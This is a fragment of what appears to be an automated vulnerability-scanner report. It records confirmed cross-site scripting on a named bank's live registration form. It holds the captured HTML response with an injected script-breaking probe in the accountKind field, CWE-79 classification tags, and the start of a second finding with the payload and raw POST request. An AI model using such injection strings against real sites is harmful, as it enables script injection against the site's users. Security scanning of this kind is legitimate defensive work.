    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000169)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;BBAC47&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BaccountKind%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000168)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
